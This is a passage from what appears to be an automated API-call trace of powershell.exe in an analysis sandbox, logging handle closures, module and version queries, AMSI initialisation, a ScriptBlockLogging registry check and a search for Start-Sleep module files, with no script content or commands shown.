(hObject=0x6dc) returned 1 [0240.670] UnmapViewOfFile (lpBaseAddress=0x20c0000) returned 1 [0240.671] CloseHandle (hObject=0x3a8) returned 1 [0240.672] CloseHandle (hObject=0x564) returned 1 [0240.672] CloseHandle (hObject=0x6a4) returned 1 [0240.672] CloseHandle (hObject=0x694) returned 1 [0240.672] CloseHandle (hObject=0x700) returned 1 [0240.673] CloseHandle (hObject=0x698) returned 1 [0240.673] DeregisterEventSource (hEventLog=0x1a670008) returned 1 [0240.702] CloseHandle (hObject=0x6fc) returned 1 [0240.702] CloseHandle (hObject=0x6c0) returned 1 [0240.702] CloseHandle (hObject=0x6bc) returned 1 [0240.703] CloseHandle (hObject=0x6b8) returned 1 [0240.703] CloseHandle (hObject=0x274) returned 1 [0240.703] CloseHandle (hObject=0x6b4) returned 1 [0240.704] CloseHandle (hObject=0x6e0) returned 1 [0240.704] CloseHandle (hObject=0x684) returned 1 [0240.705] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0240.705] CloseHandle (hObject=0x26c) returned 1 [0240.705] CloseHandle (hObject=0x584) returned 1 [0240.706] CloseHandle (hObject=0x598) returned 1 [0240.707] CoGetContextToken (in: pToken=0x1eff470 | out: pToken=0x1eff470) returned 0x0 [0240.707] CoGetContextToken (in: pToken=0x1eff370 | out: pToken=0x1eff370) returned 0x0 [0240.707] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2 [0240.707] Release () returned 0x1 Thread: id = 235 os_tid = 0x5bc [0240.674] CoGetContextToken (in: pToken=0x1a4bf860 | out: pToken=0x1a4bf860) returned 0x0 [0240.674] CObjectContext::QueryInterface () returned 0x0 [0240.674] CObjectContext::GetCurrentThreadType () returned 0x0 [0240.674] Release () returned 0x0 Thread: id = 236 os_tid = 0x878 Thread: id = 237 os_tid = 0x4d0 Thread: id = 238 os_tid = 0x89c Thread: id = 239 os_tid = 0x1024 [0224.072] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.366] CoCreateGuid (in: pguid=0x1b7ff0f8 | out: pguid=0x1b7ff0f8*(Data1=0x56abd450, Data2=0x3597, Data3=0x452e, Data4=([0]=0x80, [1]=0x51, [2]=0x5, [3]=0xb4, [4]=0xfb, [5]=0x35, [6]=0x4d, [7]=0x80))) returned 0x0 [0224.373] GetCurrentProcessId () returned 0x518 [0224.373] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x518) returned 0x5e0 [0224.373] EnumProcessModules (in: hProcess=0x5e0, lphModule=0x23c5c48, cb=0x200, lpcbNeeded=0x1b7feed8 | out: lphModule=0x23c5c48, lpcbNeeded=0x1b7feed8) returned 1 [0224.374] GetModuleInformation (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpmodinfo=0x23c5eb8, cb=0x18 | out: lpmodinfo=0x23c5eb8*(lpBaseOfDll=0x7ff6edf60000, SizeOfImage=0x78000, EntryPoint=0x7ff6edf631a0)) returned 1 [0224.375] CoTaskMemAlloc (cb=0x804) returned 0x1a619410 [0224.375] GetModuleBaseNameW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpBaseName=0x1a619410, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0224.375] CoTaskMemFree (pv=0x1a619410) [0224.375] CoTaskMemAlloc (cb=0x804) returned 0x1a619c20 [0224.375] GetModuleFileNameExW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpFilename=0x1a619c20, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0224.375] CoTaskMemFree (pv=0x1a619c20) [0224.375] CloseHandle (hObject=0x5e0) returned 1 [0224.375] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x518) returned 0x5e0 [0224.376] EnumProcessModules (in: hProcess=0x5e0, lphModule=0x23c8120, cb=0x200, lpcbNeeded=0x1b7feed8 | out: lphModule=0x23c8120, lpcbNeeded=0x1b7feed8) returned 1 [0224.377] GetModuleInformation (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpmodinfo=0x23c8390, cb=0x18 | out: lpmodinfo=0x23c8390*(lpBaseOfDll=0x7ff6edf60000, SizeOfImage=0x78000, EntryPoint=0x7ff6edf631a0)) returned 1 [0224.377] CoTaskMemAlloc (cb=0x804) returned 0x1a61b450 [0224.377] GetModuleBaseNameW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpBaseName=0x1a61b450, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0224.377] CoTaskMemFree (pv=0x1a61b450) [0224.377] CoTaskMemAlloc (cb=0x804) returned 0x1a6173d0 [0224.377] GetModuleFileNameExW (in: hProcess=0x5e0, hModule=0x7ff6edf60000, lpFilename=0x1a6173d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0224.377] CoTaskMemFree (pv=0x1a6173d0) [0224.377] CloseHandle (hObject=0x5e0) returned 1 [0224.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1b7fe9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0224.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fede0) returned 1 [0224.379] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b7feec0 | out: lpFileInformation=0x1b7feec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2c94e9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a00)) returned 1 [0224.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7feda0) returned 1 [0224.380] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0x1b7fef98 | out: lpdwHandle=0x1b7fef98) returned 0x73c [0224.381] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x73c, lpData=0x23ca6d8 | out: lpData=0x23ca6d8) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b7fef18, puLen=0x1b7fef10 | out: lplpBuffer=0x1b7fef18*=0x23caa70, puLen=0x1b7fef10) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23ca790, puLen=0x1b7feeb0) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23ca7e4, puLen=0x1b7feeb0) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23ca82c, puLen=0x1b7feeb0) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23ca89c, puLen=0x1b7feeb0) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23ca8d8, puLen=0x1b7feeb0) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23ca95c, puLen=0x1b7feeb0) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23ca9a4, puLen=0x1b7feeb0) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23caa14, puLen=0x1b7feeb0) returned 1 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x0, puLen=0x1b7feeb0) returned 0 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x0, puLen=0x1b7feeb0) returned 0 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x0, puLen=0x1b7feeb0) returned 0 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x0, puLen=0x1b7feeb0) returned 0 [0224.381] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1b7fee68, puLen=0x1b7fee60 | out: lplpBuffer=0x1b7fee68*=0x23caa70, puLen=0x1b7fee60) returned 1 [0224.382] VerLanguageNameW (in: wLang=0x409, szLang=0x1b7feb90, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0224.382] VerQueryValueW (in: pBlock=0x23ca6d8, lpSubBlock="\\", lplpBuffer=0x1b7feeb8, puLen=0x1b7feeb0 | out: lplpBuffer=0x1b7feeb8*=0x23ca700, puLen=0x1b7feeb0) returned 1 [0224.439] AmsiInitialize () returned 0x0 [0224.466] AmsiOpenSession () returned 0x0 [0224.466] AmsiScanString () returned 0x80070015 [0224.567] EtwEventRegister () returned 0x0 [0224.567] EtwEventSetInformation () returned 0x0 [0224.573] RoGetParameterizedTypeInstanceIID () returned 0x0 [0224.574] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0224.574] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0224.630] WindowsCreateStringReference () returned 0x0 [0224.630] RoGetActivationFactory () returned 0x0 [0224.633] QueryInterface () returned 0x0 [0224.633] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0224.633] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0224.633] QueryInterface () returned 0x0 [0224.633] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0224.633] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0224.633] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0224.633] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0224.633] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0224.634] Release () returned 0x4 [0224.634] CoGetContextToken (in: pToken=0x1b7fcb80 | out: pToken=0x1b7fcb80) returned 0x0 [0224.634] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0224.634] CoGetContextToken (in: pToken=0x1b7fcdc0 | out: pToken=0x1b7fcdc0) returned 0x0 [0224.634] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0224.634] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0224.634] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0224.634] WindowsDeleteString () returned 0x0 [0224.634] Release () returned 0x2 [0224.634] CoGetContextToken (in: pToken=0x1b7fd7f0 | out: pToken=0x1b7fd7f0) returned 0x0 [0224.635] CoGetContextToken (in: pToken=0x1b7fd6f0 | out: pToken=0x1b7fd6f0) returned 0x0 [0224.635] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0224.635] AddRef () returned 0x4 [0224.635] Release () returned 0x3 [0224.642] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0224.658] GenericStreamBase::Write () returned 0x0 [0224.658] GenericStreamBase::Write () returned 0x0 [0224.658] CoCreateGuid (in: pguid=0x7ffb09cf5390 | out: pguid=0x7ffb09cf5390*(Data1=0x4cc02dca, Data2=0xc23e, Data3=0x45a8, Data4=([0]=0x92, [1]=0x3e, [2]=0xe1, [3]=0x86, [4]=0x5f, [5]=0x67, [6]=0x38, [7]=0x3e))) returned 0x0 [0224.658] GenericStreamBase::Write () returned 0x0 [0224.661] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0224.661] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x3 [0224.661] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0224.661] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0224.661] Release () returned 0x3 [0224.661] CoGetContextToken (in: pToken=0x1b7fc930 | out: pToken=0x1b7fc930) returned 0x0 [0224.661] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0224.662] WindowsCreateString () returned 0x0 [0224.662] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x4 [0224.662] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0224.663] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0224.945] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b7fee40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0225.039] EtwEventActivityIdControl () returned 0x0 [0225.039] EtwEventActivityIdControl () returned 0x0 [0225.040] EtwEventActivityIdControl () returned 0x0 [0225.046] EtwEventActivityIdControl () returned 0x0 [0225.046] EtwEventActivityIdControl () returned 0x0 [0225.046] EtwEventActivityIdControl () returned 0x0 [0225.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7fdd80, nSize=0x80 | out: lpBuffer="") returned 0x0 [0225.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7fdd80, nSize=0x80 | out: lpBuffer="") returned 0x0 [0225.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7fdde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0225.278] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7feec8 | out: phkResult=0x1b7feec8*=0x0) returned 0x2 [0225.279] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7feec8 | out: phkResult=0x1b7feec8*=0x0) returned 0x2 [0225.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7fdd30, nSize=0x80 | out: lpBuffer="") returned 0x0 [0225.288] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b7fe860, nSize=0x80 | out: lpBuffer="") returned 0x0 [0225.368] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7fe660, nSize=0x80 | out: lpBuffer="") returned 0x3a [0225.368] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b7fe610, nSize=0x80 | out: lpBuffer="") returned 0x3a [0225.369] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7fe680, nSize=0x80 | out: lpBuffer="") returned 0x63 [0225.378] CoTaskMemAlloc (cb=0x20e) returned 0x602e90 [0225.378] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x602e90 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x24 [0225.378] CoTaskMemFree (pv=0x602e90) [0225.378] CoTaskMemAlloc (cb=0x20e) returned 0x602e90 [0225.378] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x602e90, cchBuffer=0x105 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.380] CoTaskMemFree (pv=0x602e90) [0225.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x23 [0225.386] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0225.386] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.387] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.388] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.ps1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.391] CoTaskMemAlloc (cb=0x20e) returned 0x602e90 [0225.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x602e90, nSize=0x105 | out: lpBuffer="") returned 0x0 [0225.391] CoTaskMemFree (pv=0x602e90) [0225.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.391] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x24 [0225.392] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0225.392] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.392] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.393] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psm1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.393] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x24 [0225.394] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0225.394] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.394] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.395] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psd1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.395] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0225.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0225.396] GetFullPathNameW (in: 